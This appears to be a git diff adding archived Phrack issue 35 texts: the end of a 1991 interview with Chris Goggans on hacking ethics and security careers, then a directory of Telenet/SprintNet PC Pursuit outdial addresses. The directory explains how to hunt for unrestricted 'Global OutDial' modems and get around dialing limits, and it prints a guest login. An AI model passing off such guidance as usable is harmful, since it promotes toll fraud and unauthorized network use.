+          And my particular focus has been on computer security.
+
+ISPNews:  At least the dark side of that coin.
+
+     CG:  I wouldn't say the dark side.  I'd say the flip side.  If you do
+          something for 11 years, you are going to pick up a lot of knowledge.
+          And I've always wanted to find some kind of productive career that I
+          thoroughly enjoyed.  So this was just an obvious progression.  No one
+          wants to be a 40-year-old hacker living in fear of the Secret
+          Service.
+
+ISPNews: When you first applied to enter college, did you feel that it was the
+          right place to learn about information security?
+
+     CG: Yes, I thought it was the right place, mainly because college is the
+          most obvious choice to pursue an education in any field.  I just
+          assumed that I would be able to find formal training leading to
+          certification or a degree in this field.  Yet, at the University of
+          Texas, there wasn't anything along those lines.
+
+ISPNews:  Did you graduate from the University of Texas?
+
+     CG: No, I changed majors and then moved to Houston.  I had started out in
+          computer science but it was completely unrelated to any kind of
+          career I wanted to pursue.  I eventually changed my major to
+          journalism.  There are only two things I like to do:  Work on
+          computers, and write.  So, if I wasn't going to get a degree in one,
+          it was going to be in the other.  I'm a semester away, and I do plan
+          on finishing.
+
+ISPNews:  If you were to structure a college curriculum for studies in
+          information security, would you design it to focus on technical
+          issues, ethics, business issues, or legal matters?
+
+     CG: I would try to focus on all of these.  If you don't have a technical
+          background, you can't understand the way the operating system works,
+          and you really can't focus on some of the issues that need to be
+          addressed with information security.
+
+          Ethics certainly come into play ass well for obvious reasons.  I
+          don't think hackers are going to go away.  Even with the advent of
+          newer technology, there are always going to be people who have an
+          interest in that technology and will learn how to manipulate it.
+
+
+ETHICS, INTELLECTUAL PROPERTY RIGHTS, AND THE LAW
+
+ISPNews:  What is your definition of a hacker?
+
+     CG: A Hacker is someone who wants to find out everything that there is to
+          know about the workings of a particular computer system, and will
+          exhaust every means within his ability to do so.
+
+ISPNews:  Would you also comment on the ethics of hacking?
+
+     CG: There is an unwritten code of ethics that most people tend to adhere
+          to.  It holds that: no one would ever cause damage to anything; and
+          no one would use any information found for personal gain of any kind.
+
+          For the most part, the only personal gain that I have ever seen from
+          any sort of hacking activity is the moderate fame from letting others
+          know about a particular deed.  And even in these cases, the total
+          audience has been limited to just a few hundred.
+
+ISPNews:  Are you unaware of hackers who have in fact accessed information,
+          then sold it or massaged it for money?
+
+     CG: No, certainly not.  I am just acknowledging and defining a code of
+          ethics.  We of the Legion of Doom tried to adhere to that code of
+          ethics.  For example, members of the original nine who acted
+          unethically were removed from the group.
+
+ISPNews:  Do you believe that penetrating a computer system without either
+          making changes or removing information is ethical, or a least is not
+          unethical?
+
+     CG:  At one time in the past I may have held that belief, but now I
+          certainly must not, because the whole idea of being involved in the
+          formation of my new company, Comsec Data Security, would show
+          otherwise.
+
+ISPNews:  So today, you believe that unauthorized entry is unethical.
+
+     CG:  Exactly.  As a hacker, I didn't particularly hold that.  But as
+          things such as invasion of privacy, even though I never caused any
+          damage, and breach of trust became more apparent to me, I was able to
+          step back, see the picture, and realize it was wrong.
+
+ISPNews:  Can I conclude that you are speaking for you company and its
+          principals?
+
+     CG:  Yes, I am speaking for all of the principals.
+
+ISPNews:  What are your views on the ownership of information?
+
+     CG:  I feel that proprietary information, national-security-related
+          information, information that could be considered a trade secret, all
+          definitely have ownership, and access should be restricted.
+
+          In the past, I felt that information that affected me or had some
+          relevance to my life should be available to me.  I felt that
+          information should be available to the people it affected, whether
+          that be phone company information, credit bureau information, banking
+          information, or computer system information in general.  I am saying
+          this in the past tense.
+
+          In the present tense, I feel that the public is entitled only to
+          information in the public domain.  Information not available legally
+          through normal channels is just going to have to be left at that.
+
+ISPNews:  Do you believe that software should always be in the public
+domain.?
+
+     CG: No, I do not.  If I wrote something as wonderful as Lotus, or any of
+          the Microsoft programs, or Windows, I would want people to pay for
+          them.
+
+ISPNews:  Then you do believe in private ownership of and protection for
+          software?
+
+     CG:  Yes, definitely.
+
+ISPNews:  What are you views on current U.S.  Computer crime laws?
+
+     CG:  I think that the current laws are too broad.  They do not make
+          distinctions between various types of computer crimes.  I consider
+          breaking into a computer akin to trespassing.  If someone simply
+          walks across my lawn, I might be upset because they trampled my
+          grass, but I would leave it at that.  If someone drives across my
+          lawn and leaves big trenches, and then comes over and kicks down my
+          rosebush, well that's another thing.  Then, if someone drives up my
+          steps, goes through my house, through my kitchen, steals all my
+          silverware, and then leaves, that's something completely different.
+          And while these physical representations of trespassing can't be
+          applied directly to an electronic format, distinctions are still
+          necessary.
+
+ISPNews: And the present computer crime laws do not make these distinctions?
+
+     CG: I am no lawyer, but from my understanding they do not.  They need to
+          be brought into focus.
+
+ISPNews: If they were brought into the kind of focus you suggest, would they
+          be fair and equitable?
+
+     CG: Definitely, depending on the punishment that went along with them.  I
+          don't think that people who own and operate computer systems would
+          view someone who has logged into their system using a guest account
+          that was deliberately left with no password to be as serious an
+          intrusion as someone who got the system administrator password and
+          then went through and deleted all the files.  I don't think that
+          simple intrusion would be considered as serious as unauthorized
+          penetration along with the wholesale theft and sale to a competitor
+          of marketing information, and advertising plans, and financial
+          projections for the next quarter.
+
+ISPNews:  What are your views on security training for users?
+
+     CG: People need to be taught what the computer operating system is and
+          how it works.  After that, they need to establish some sort of
+          channel by which information can be transmitted to others. Direct
+          physical contact between communicating parties, covered by official,
+          standard company procedures, is the best way to do this.
+
+          People need to be aware that their account, no matter the level of
+          importance, is a link in a chain that makes up the security of the
+          system.  Information from one account can be used as a springboard to
+          other, more powerful accounts.  All users within a network must
+          understand that their information is just as important in the
+          security chain as is that of the next person.
+
+ISPNews: Given where you are coming from, why should a potential client trust
+          you?
+
+     CG: I know that is a natural question.  Just the very nature of creating
+          a company should project an image that we are trying to come out of
+          the shadows, out of the underground.  We are saying, "Look everybody,
+          we've been doing this for a long time, now we want to help.  We have
+          11 years of working information about how people compromise existing
+          security, and we can help with your particular situation."
+
+ISPNews: I am sure that you understand the natural suspicion that people have.
+
+     CG:  No, that's what I don't understand.  If we at Comsec were out to
+          compromise information from an existing company's computer network,
+          we wouldn't have incorporated.  We could have done that, and someone
+          else out there probably has already done so.  Then the information
+          would be available to from one hacker to another.
+
+ISPNews: Are you suggesting there is no system out there that you can't break
+          into?
+
+     CG: No, I'm not suggesting that.  But I am saying the vast majority can
+          be penetrated.
+
+ISPNews:  Which system is easiest to crack; and which is most difficult?
+
+     CG:  It is hard to say which system is more inherently penetrable than
+          another.  From the initial log-in, it's not the operating system;
+          rather it's the system's operating environment that is the problem.
+          Users may not have addressed security measures.  Certain types of
+          security holes may not have been closed.  That's where a technical
+          background comes into play: to understand the way the applications
+          work; how different systems are accessed; to close holes in the
+          system which have become apparent.  You have to deal with human
+          factors and technical issues.  You must understand the way the
+          computer works and the way programs are run.
+
+ISPNews:  What is the best way to foil hackers?
+
+     CG: It depends on the hacker.  There are different types.  Some people
+          hack with modems.  The casual hacker may just stumble across your
+          particular computer system, and may be foiled with something as
+          simple as good external security.  He may be turned off by physical
+          security devices such as a call-back modem, some sort of code access,
+          or smart card.
+
+          These measures will not stop a serious hacker who is after your
+          company specifically.  In this case, you have to beef up security,
+          and take additional steps to ensure the safety of your computer.  And
+          you must make certain that security on the inside is as tight as on
+          the outside.
+
+ISPN Editor's Note:  Chris Goggans will respond, in every other issue of
+                     ISPNews, to your questions on hacking computer systems.
+                     His answers promise to be problem-solving, interesting,
+                     and even entertaining.  We invite you to write Chris c/o:
+
+                     "Hackers' Mailbag"
+                     ISPNews
+                     498 Concord Street
+                     Framingham, MA  01701-2357
+_______________________________________________________________________________
diff --git a/phrack35/4.txt b/phrack35/4.txt
new file mode 100644
index 0000000..5dc5b08
--- /dev/null
+++ b/phrack35/4.txt
@@ -0,0 +1,1230 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-five, File 4 of 13
+
+                                Amadeus Presents
+ //////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+<<<<<<<<<<<<<  TELENET/SPRINTNET'S PC PURSUIT OUTDIAL DIRECTORY >>>>>>>>>>>
+ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\////////////////////////////////////
+                                October 25, 1991
+
+Area
+Code  City, State U.S.A.              300 bps      1200 bps     2400 bps
+--- --------------------------------- ------------ ------------ ------------
+201 Newark, New Jersey                311020100001 311020100301 311020100022
+    NJNEW                                2011         201301       20122
+202 Washington, D.C.                  311020200115 311020200116 311020200117
+    DCWAS                                202115       202116       202117
+203 Hartford, Connecticutt            311020300120 311020300121 311020300105
+    CTHAR                                203120       203121       203105
+206 Seattle, Washington               311020600205 311020600206 311020600208
+    WASEA                                206205       206206       206208
+212 New York, New York                311021200315 311021200316 311021200412
+    NYNYO                                212315       212316       212412
+                                                               311021200028
+                                                                   21228
+213 Glendale, California              Same as 818,see 818's NUAs & addresses
+    CAGLE                                       (Dial 1213+number)
+213 Los Angeles, California                        311021300412 311021300413
+    CALAN                                             213412       213413
+                                                   311021300103 311021300023
+                                                      213103       21323
+213 Santa Ana, California             Same as 714,see 714's NUAs & addresses
+    CASAN                                       (Dial 1213+number)
+214 Dallas, Texas                     311021400117 311021400118 311021400022
+    TXDAL                                214117       214118       21422
+215 Philadelphia, Pennsylvania        311021500005 311021500112 311021500022
+    PAPHI                                2155         215112       21522
+216 Cleveland, Ohio                   311021600020 311021600021 311021600120
+    OHCLE                                21620        21621        216120
+301 Washington, D.C.                  Same as 202,see 202's NUAs & Addresses
+    DCWAS                                       (Dial 1301+number)
+303 Denver, Colorado                  311030300114 311030300115 311030300021
+    CODEN                                303114       303115       30321
+305 Miami, Florida                    311030500120 311030500121 311030500122
+    FLMIA                                305120       305121       305122
+312 Chicago, Illinois                 311031200410 311031200411 311031200024
+    ILCHI                                312410       312411       31224
+313 Ann Arbor, Michigan                No 300 bps
+    MIAAR                                access
+313 Detroit, Michigan                 311031300214 311031300216 311031300024
+    MIDET                                313214       313216       31324
+314 St. Louis, Missouri               311031400020 311031400021 311031400005
+    MOSLO                                31420        31421        3145
+317 Indianapolis, Indiana              No 300 bps
+    ININD                                access
+404 Atlanta, Georgia                  311040400113 311040400114 311040400022
+    GAATL                                404113       404114       40422
+407 Miami, Florida                    Same as 305,use 305's NUAs & addresses
+    FLMIA                                       (Dial 1407+number)
+407 Orlando, Florida                   No 300 bps
+    FLORL                                access
+408 San Jose, California              311040800110 311040800111 311040800021
+    CASAN                                408110       408111       40821
+412 Pittsburgh, Pennsylvania           No 300 bps
+    PAPIT                                access
+414 Milwaukee, Wisconsin              311041400020 311041400021 311041400120
+    WIMIL                                41420        41421        414120
+415 Oakland, California               311041500108 311041500109 311041500224
+    CAOAK                                415108       415109       415224
+415 Palo Alto, California             311041500108 311041500011 311041500005
+    CAPAL                                415108?      41511        4155?
+415 San Francisco, California         311041500215 311041500217 311041500217
+    CASFA                                415215       415217       415217?
+415 San Jose, California              Same as 408,use 408's NUAs & addresses
+    CASJO                                       (Dial 1415+number)
+503 Portland, Oregon                  311050300020 311050300021
+    ORPOR                                50320        50321
+504 New Orleans, Louisiana             No 300 bps
+    LANOR                                access
+512 Austin, Texas                      No 300 bps
+    TXAUS                                access
+516 Hempstead, New York                No 300 bps  311051600014
+    NYHEM                                access       51614
+516 New York, New York                Same as 212,use 212's NUAs & addresses
+    NYNYO                                       (Dial 1516+number)
+601 Memphis, Tennessee                Same as 901,use 901's NUAs & addresses
+    TNMEM                                       (Dial 1601+number)
+602 Phoenix, Arizona                  311060200020 311060200021
+    AZPHO (Some 602 numbers require      60220        60221
+           1602+number, see exchange  311060200022 311060200023 311060200026
+           database below)               60222        60223        60226
+612 Minneapolis, Minnesota            311061200120 311061200121 311061200022
+    MNMIN                                612120       612121       61222
+614 Columbus, Ohio                     No 300 bps
+    OHCOL                                access
+617 Boston, Massachusetts             311061700311 311061700313 311061700026
+    MABOS                                617311       617313       61726
+618 St. Louis, Missouri               Same as 314,use 314's NUAs & addresses
+    MOSLO                                       (Dial 1618+number)
+619 San Diego, California
+    CASDI
+703 Washington, D.C.                  Same as 202,use 202's NUAs & addresses
+    DCWAS                                       (Dial 1703+number)
+708 Chicago, Illinois                 Same as 312,use 312's NUAs & addresses
+    ILCHI                                       (Dial 1708+number)
+713 Houston, Texas                    311071300113 311071300114 311071300024
+    TXHOU                                713113       713114       71324
+714 Colton, California                311071400119 311071400121 311071400102
+    CACOL                                714119       714121       714102
+714 Santa Ana, California             311071400023 311071400024 311071400021
+    CASAN                                71423        71424        71421
+                                      311071400210 311071400213 311071400004
+                                         714210       714213       7144
+718 New York, New York                Same as 212,use 212's NUAs & addresses
+    NYNYO                                       (Dial 1718+number)
+801 Salt Lake City, Utah              311080100020 311080100021 311080100012
+    UTSLC                                80120        80121        80112
+813 Tampa, Florida                    311081300020 311081300021 311081300124
+    FLTAM                                81320        81321        813124
+815 Chicago, Illinois                 Same as 312,use 312's NUAs & addresses
+    ILCHI                                       (Dial 1312+number)
+816 Kansas City, Missouri             311081600104 311081600221 311081600113
+    MOKCI                                816104       816221       816113
+817 Dallas, Texas                     Same as 214,use 214's NUAs & addresses
+    TXDAL                                       (Dial 1817+number)
+818 Glendale, California                           311081800021
+    CAGLE                                             81821
+818 Los Angeles, California           Same as 213,use 213's NUAs & addresses
+    CALAN                                       (Dial 1818+number)
+901 Memphis, Tennessee                 No 300 bps
+    TNMEM                                access
+908 New Brunswick, New Jersey          No 300 bps
+    NJNBR                                access
+908 Newark, New Jersey                Same as 201,use 201's NUAs & addresses
+    NJNEW                                       (Dial 1908+number)
+913 Kansas City, Missouri             Same as 816,use 816's NUAs & addresses
+    MOKCI                                       (Dial 1913+number)
+914 New York, New York                Same as 212,use 212's NUAs & addresses
+    NYNYO                                       (Dial 1914+number)
+916 Sacramento, California            311091600011 311091600012 311091600007
+    CASAC                                91611        91612        9167
+919 Research Triangle Park,N Carolina 311091900020 311091900021 311091900124
+    NCRTP                                91920        91921        919124
+
+KEY: NUA (X.25 International Inter-Network User Address)------>311012300456
+     Sprintnet/Telenet's Intra-network address --------------->    123456
+
+PC Pursuit Outdial City/Area Code Cross Reference Directory
+-----------------------------------------------------------
+
+Ann Arbor, Michigan               313  New Brunswick, New Jersey        908
+Atlanta, Georigia                 404  New Orleans, Louisiana           504
+Austin, Texas                     512  New York, New York  212,516,718 &914
+Boston, Massachusetts             617  Newark, New Jersey          201 &908
+Chicago, Illinois      312, 708 & 815  Oakland, California              415
+Cleveland, Ohio                   216  Orlando, Florida                 407
+Colton, California                714  Palo Alto, California            415
+Columbus, Ohio                    614  Philadelphia, Pennsylvania       215
+Dallas, Texas               214 & 817  Phoenix, Arizona                 602
+Denver, Colorado                  303  Pittsburgh, Pennsylvania         412
+Detroit, Michigan                 313  Portland, Oregon                 503
+Glendale, California        213 & 818  Research Triangle Park,N Carolina919
+Hartford, Connecticutt            203  Sacramento, California           916
+Hempstead, New York               516  Salt Lake City, Utah             801
+Houston, Texas                    713  San Diego, California            619
+Indianapolis, Indiana             317  San Francisco, California        415
+Kansas City, Missouri       816 & 913  San Jose, California        408 &415
+Los Angeles, California     213 & 818  Santa Ana, California       213 &714
+Memphis, Tennessee          601 & 901  Seattle, Washington              206
+Miami, Florida              305 & 407  St. Louis, Missouri         314 &618
+Milwaukee, Wisconsin              414  Tampa, Florida                   813
+Minneapolis, Minnesota            612  Washington, D.C.       202, 301 &703
+
+Preface
+-------
+
+The PC Pursuit outdials, although limited in their dialing range, are of
+fundamental knowledge to any X.25 hacker in the world.  Collecting the
+addresses of the PC Pursuit outdials is among the first projects of any
+hacker new to the X.25 hacking arena.  On and off through the years since
+1986 when I first happened upon the X.25 scene, I have been attempting to
+compile the complete list of NUAs for all of the outdials.  I still haven't
+realized this goal five years later, as can be evidenced by blanks in the
+above list.
+
+Other outdials, such as the ones hacked out of explorations of internal
+corporate, government, or educational networks, come and go usually as fast
+as codes.  Some of these outdials are prize finds that can dial any number
+in the world and would supplant the usefulness of this list.  But such out-
+dials are normally gone in a matter of weeks.  The ones that do stay around
+(such as the infamous 30209160xxxx global outdials) do not work very well.
+Of course there are exceptions to every rule.  Some Global OutDials (GODs)
+go on working for years, but only because they are known only by one or a
+few hackers who don't go around giving it to everyone in hackerdom far and
+wide.
+
+The PC Pursuit outdials have been functioning without fail for several years
+and will continue to be a reliable and useful hacker's tool for the foreseeable
+future.  You can count on them to be there when you need them, especially when
+a GOD you've been using fails and you need something to fall back on. I have
+put together these two files to help further facilitate your use of the PC
+Pursuit outdials.  I hope you find them useful references.
+
+Some Notes for Beginners
+------------------------
+
+All the modems that you access on the outdials are of the Racal-Vadic brand
+and accept the standard Hayes AT command set as a default.  I will not go
+into an explanation of AT commands since you should already know them as a
+competent user of your computer and modem.  If not, check your modem's
+manual since it is almost certainly a Hayes compatible modem.
+
+The Racal-Vadic modem offers its own command mode as an alternative to the
+industry standard Hayes AT command set.  To access the Racal-Vadic mode, type a
+CTRL-E and then RETURN.  You will see "READY" and an asterisk for a prompt.
+Type "?" for a list of commands.  This mode is more attractive to many users
+because of its verbose interface and detailed call progress messages; because
+fewer keystrokes are needed to execute commands such as dial, and because of
+its ability to redial up to nine times until a connection is made.
+
+None of the outdials allow you to call them collect.  You will have to call
+them from either a PAD (Packet Assembler Deassembler) or NUI (Network User
+ID).  PC Pursuit IDs can also be used as pseudo-NUIs by typing the NUA
+followed by a comma, the PCP ID, another comma, and the PCP Password.  If
+you do not already have one, you will have to consult a fellow hacker for a
+valid NUI or PAD (not as freely traded nowadays).  Or, to really impress
+your hacker friends, hack your own. (Consult other files featured in Phrack
+that deal with this subject matter.)
+
+The 12 digit NUA (Network User Address) for each outdial above is for accessing
+the outdial from a network other than SprintNet/Telenet.
+
+The shorter five to six digit number below it is for accessing the outdial
+from SprintNet/Telenet.  Actually, you can use the 12 digit number as well
+as the shorter five to six digit number (if you precede the 12 digit NUA
+with a 0) on SprintNet, but the shorter one is easier to remember and use.
+
+For the purposes of memorizing the outdials that you will use more often, it is
+a simple matter of remembering the shorter SprintNet address and convert- ing
+it to the 12 digit NUA as needed like this:
+
+SprintNet address xxxyyy becomes 3110xxx00yyy (Add 0's in yyy where needed)
+EXAMPLE:          813124 becomes 311081300124
+EXAMPLE2:         4155   becomes 311041500005 (Add preceding 0's in yyy)
+
+Note that networks usually require you to precede the NUA with a 0 or 1
+(usually 0) much like when you dial a long distance phone call.  For
+example, on Tymnet, typing an NUA does not require a 0 or 1.  On Canada's
+DataPac, a 1 is required before the 12 digit NUA.  On SprintNet and most
+European X.25 networks, a 0 is needed.
+
+When you connect with an outdial modem, the first thing you might want to
+do is to redial the last number dialed.  The last person who used the modem
+might have called a number that would be of interest to you in your hacking
+endeavors.  Enter the Racal-Vadic mode and execute the "R" redial command.
+The last number dialed is shown on the screen and dialed.  The A/ command
+in the Hayes AT command mode won't work for this purpose since the last
+number dialed is not shown and the last command executed isn't necessarily a
+dialing command.
+
+Unfortunately, when a person exits the outdial, the modem resets itself in
+most cases and the last number dialed is lost.  But occasionally you'll get
+lucky and find an interesting new number to call
+
+Calling Specific Modems, and GODs (Global OutDials)
+---------------------------------------------------
+
+Each outdial has many modems that you can connect to.  When calling the
+outdial NUA, you will be connected to the first available modem.  If all
+are being used, you will get a busy message.  It is possible for you to
+attempt to connect to one particular modem in the series rather than
+connect to the first available unused modem.
+
+Append two digits to the end of a NUA to specify which modem you want.
+For example, to connect to the third modem on 311061200022, you would
+call NUA 31106120002203.  So theoretically, you can call up to 99
+different modems on the same outdial (31106120002200 is the same as
+311061200022), but no outdials have this many modems.
+
+On SprintNet, you can append a letter to the four to six digit address
+to specify a modem.  You can also add a decimal point and then the two
+digits for modems above 26 (and below).  For example, 31106120002203 is
+the same as 61222C and 61222.03; 31108130012426 is the same as 813124Z
+and 813124.26.
+
+So, you may ask, why would I want to call a specific modem?
+
+The reason is that some modems permit unrestrictive dialing.  Such modems
+will let you dial ANY number in the world, not just the local numbers
+that you're only suppose to call.  Such modems are known as GODs, which
+stands for Global OutDial.
+
+GODs don't last forever.  As soon as the SprintNet priests discover the
+abuse occurring on a particular modem, they'll fix it.  So you'll have to
+talk with your fellow hackers to find out which modems are known to be
+GODs, or better yet, scan for your own.
+
+Local Exchange Database
+-----------------------
+
+For those using the outdials from international locations, it is important
+to note that you cannot call just any number in the same area code as the 
+outdial.  Unless you're using a GOD (see part A), you can only dial numbers
+local to the city the outdial is in.
+
+At the end of this file you will find a database of all the exchanges (the
+three numbers in a telephone number after the area code) that are dial-able
+from each outdial.  This database will not only be useful to verify for sure
+that you can dial a particular number from a PC Pursuit outdial, but will also
+be useful for checking which outdial to use in cases where multiple outdials
+can be used to dial different numbers in the same area code.  For example you
+can dial numbers in area code 213 from THREE different outdials: 213 CALAN, 818
+CAGLE, *and* 714 CASAN.  Unless you are familiar with the geographic dialing
+plan of the Los Angeles area, you would have to consult the exchange database
+to figure out which outdial to use.
+
+The raw data for the list was downloaded from the PC Pursuit Service BBS
+(call collectable from SprintNet at 311090900631, @C PURSUIT or @909631;
+logon as "Sprint Guest" with password "outdial").  I made some very time
+consuming modifications to the format of the list so that it could be used
+effectively with Unix's grep command or MS-DOG's FIND command (and similar
+commands on other operating systems).
+
+For example, let's say you wanted to call a BBS at 213-395-0221.  As I
+mentioned earlier, there are three different outdials that can dial numbers in
+the 213 area code.  You have to find out which one to use.  On Unix, you would
+type:
+
+% grep 213 <filename>|grep 395
+
+Or on MS-DOS, you would type:
+
+C:\>FIND "213" <filename>|FIND "395"
+
+where <filename> is the name this file is saved under.  You will then see:
+ OB
+1 213 CAGLE 393 394 395 396 399 400 413 415 450 451 452 453 454 455 458
+  213 CALAN 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400
+
+As you can see, you can call 1-213-395-0221 from two outdials: CAGLE and
+CALAN.  But notice that the CAGLE outdial has a 1 in front of it.  This
+means that if you use the CAGLE outdial, you will have to dial with the
+toll prefix (1) and area code preceding the local number since CAGLE is
+in the 818 area code.
+
+Dialing from CAGLE: ATDT12133950221
+Dialing from CALAN: ATDT3950221
+
+The Database
+------------
+
+  602 AZPHO 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234
+  602 AZPHO 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249
+  602 AZPHO 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264
+  602 AZPHO 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279
+  602 AZPHO 280 285 320 331 336 340 345 350 351 352 370 371 375 376 377
+  602 AZPHO 379 381 382 389 390 391 392 393 395 396 397 412 420 423 431
+  602 AZPHO 433 434 435 436 437 438 439 440 441 443 450 451 460 461 464
+  602 AZPHO 468 470 481 482 483 484 486 490 491 493 494 495 496 497 498
+  602 AZPHO 528 530 531 534 540 542 543 545 547 548 549 551 553 554 563
+  602 AZPHO 585 588 589 596 597 598 630 631 640 641 644 649 650 661 678
+  602 AZPHO 681 693 730 731 732 752 756 759 784 786 788 789 820 821 827
+  602 AZPHO 829 830 831 832 833 834 835 838 839 840 841 842 843 844 846
+  602 AZPHO 848 849 852 853 856 860 861 862 863 864 866 867 869 870 872
+  602 AZPHO 873 876 877 878 879 890 891 892 893 894 895 897 898 899 921
+  602 AZPHO 924 925 926 929 930 931 932 933 934 935 936 937 938 939 940
+  602 AZPHO 941 942 943 944 945 946 947 948 949 951 952 953 954 955 956
+  602 AZPHO 957 961 962 963 964 965 966 967 968 969 970 971 972 973 974
+  602 AZPHO 975 977 978 979 980 981 985 986 990 991 992 993 994 995 996
+  602 AZPHO 997 998
+1 602 AZPHO 566 583 584 546 492 561 581 582 780 569 586 471 837 373 380
+1 602 AZPHO 983 982 984 986 983 671 987 988
+  714 CACOL 275 276 335 350 351 352 353 354 355 356 357 358 359 360 369
+  714 CACOL 370 381 382 383 384 386 387 422 431 602 681 682 683 684 685
+  714 CACOL 686 687 688 689 749 780 781 782 783 784 785 787 788 789 790
+  714 CACOL 791 792 793 794 795 796 797 798 799 820 822 823 824 825 829
+  714 CACOL 872 873 874 875 876 877 880 881 882 883 884 885 886 887 888
+  714 CACOL 889
+1 213 CAGLE 201 202 203 204 205 221 222 223 224 225 226 227 228 229 230
+1 213 CAGLE 236 237 238 239 245 250 251 252 253 254 255 256 257 258 259
+1 213 CAGLE 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284
+1 213 CAGLE 285 286 287 288 289 303 310 314 315 319 340 341 342 343 345
+1 213 CAGLE 347 351 353 362 380 381 382 383 384 385 386 387 388 389 392
+1 213 CAGLE 393 394 395 396 399 400 413 415 450 451 452 453 454 455 458
+1 213 CAGLE 459 460 461 462 463 464 465 466 467 468 469 480 481 482 483
+1 213 CAGLE 484 485 486 487 488 489 520 550 551 552 553 556 557 558 559
+1 213 CAGLE 573 580 612 613 614 617 619 620 621 622 623 624 625 626 627
+1 213 CAGLE 628 629 650 651 652 653 654 655 656 657 658 659 660 661 662
+1 213 CAGLE 663 664 665 666 667 668 669 680 681 682 683 684 686 687 688
+1 213 CAGLE 689 714 730 731 732 733 734 735 736 737 738 739 740 741 742
+1 213 CAGLE 743 744 745 746 747 748 749 765 785 828 829 836 837 838 839
+1 213 CAGLE 840 841 842 849 850 851 852 854 855 856 857 858 859 870 871
+1 213 CAGLE 872 873 874 875 876 877 878 879 891 892 893 894 895 896 912
+1 213 CAGLE 913 930 931 932 933 934 935 936 937 938 939 955 960 962 963
+1 213 CAGLE 964 965 966 967 968 969 972 974 975 977
+  818 CAGLE 200 240 241 242 243 244 246 247 248 249 301 303 304 350 351
+  818 CAGLE 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366
+  818 CAGLE 367 368 370 371 372 373 374 375 376 377 378 379 381 382 393
+  818 CAGLE 397 398 399 400 401 402 403 404 405 406 409 440 441 442 443
+  818 CAGLE 444 445 446 447 448 449 450 459 500 501 502 503 504 505 506
+  818 CAGLE 507 508 509 528 542 545 546 547 548 560 564 565 566 567 568
+  818 CAGLE 569 574 575 577 578 579 580 584 753 754 760 761 762 763 764
+  818 CAGLE 765 766 767 768 769 777 780 781 782 783 784 785 786 787 788
+  818 CAGLE 789 790 791 792 793 794 795 796 797 798 799 818 821 831 840
+  818 CAGLE 841 842 843 845 846 847 848 890 891 892 893 894 895 896 897
+  818 CAGLE 898 899 901 902 903 904 905 906 907 908 909 951 952 953 954
+  818 CAGLE 955 956 957 972 980 981 982 983 984 985 986 987 988 989 990
+  818 CAGLE 994 995 997
+  213 CALAN 200 201 202 203 204 205 206 207 208 209 212 214 215 216 217
+  213 CALAN 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233
+  213 CALAN 234 235 236 237 238 239 241 245 248 249 250 251 252 253 254
+  213 CALAN 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269
+  213 CALAN 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284
+  213 CALAN 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299
+  213 CALAN 300 301 302 303 304 305 306 307 308 309 310 312 313 314 315
+  213 CALAN 316 318 319 320 321 322 323 324 327 328 329 330 331 
+  213 CALAN 334 335 336 337 338 340 341 342 343 345 347 351 353 362 370
+  213 CALAN 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385
+  213 CALAN 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400
+  213 CALAN 402 404 406 408 410 412 413 414 415 416 417 418 419 440 442
+  213 CALAN 443 444 445 446 447 450 451 452 453 454 455 458 459 460 461
+  213 CALAN 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476
+  213 CALAN 477 478 479 480 481 482 483 484 485 486 487 488 489 500 512
+  213 CALAN 515 516 520 527 531 532 533 535 536 537 538 540 541 542 543
+  213 CALAN 544 545 546 550 551 552 553 554 556 557 558 559 560 561 562
+  213 CALAN 563 564 565 566 567 568 569 573 574 578 580 581 582 583 584
+  213 CALAN 585 586 587 588 589 600 601 602 603 604 605 606 607 608 609
+  213 CALAN 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626
+  213 CALAN 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641
+  213 CALAN 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656
+  213 CALAN 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671
+  213 CALAN 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686
+  213 CALAN 687 688 689 692 693 695 696 698 699 700 702 703 712 713 714
+  213 CALAN 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729
+  213 CALAN 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744
+  213 CALAN 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759
+  213 CALAN 760 761 762 763 764 765 769 770 771 772 773 774 775 776 777
+  213 CALAN 778 779 780 781 782 783 785 791 794 801 802 803 804 806 807
+  213 CALAN 809 812 813 814 819 820 821 822 823 824 825 826 827 828 829
+  213 CALAN 836 837 838 839 840 841 842 846 849 850 851 852 854 855 856
+  213 CALAN 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871
+  213 CALAN 872 873 874 875 876 877 878 879 881 887 888 889 891 892 893
+  213 CALAN 894 895 896 903 904 907 908 912 913 920 921 922 923 924 925
+  213 CALAN 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940
+  213 CALAN 941 942 944 945 946 948 949 955 960 962 963 964 965 966 967
+  213 CALAN 968 969 970 971 972 973 974 975 977 978 979
+1 818 CALAN 200 240 241 242 243 244 246 247 280 281 282 284 285 286 287
+1 818 CALAN 288 289 300 301 302 303 307 308 309 350 357 358 359 401 402
+1 818 CALAN 409 442 443 444 445 446 447 448 450 451 457 458 459 500 502
+1 818 CALAN 507 529 545 546 547 548 570 571 572 573 574 575 576 579 580
+1 818 CALAN 805 821 956
+  415 CAOAK 200 222 223 227 231 232 233 234 235 236 237 241 243 251 252
+  415 CAOAK 253 254 255 256 261 262 263 264 265 267 268 269 271 272 273
+  415 CAOAK 274 276 278 279 282 283 284 285 287 291 292 295 296 297 298
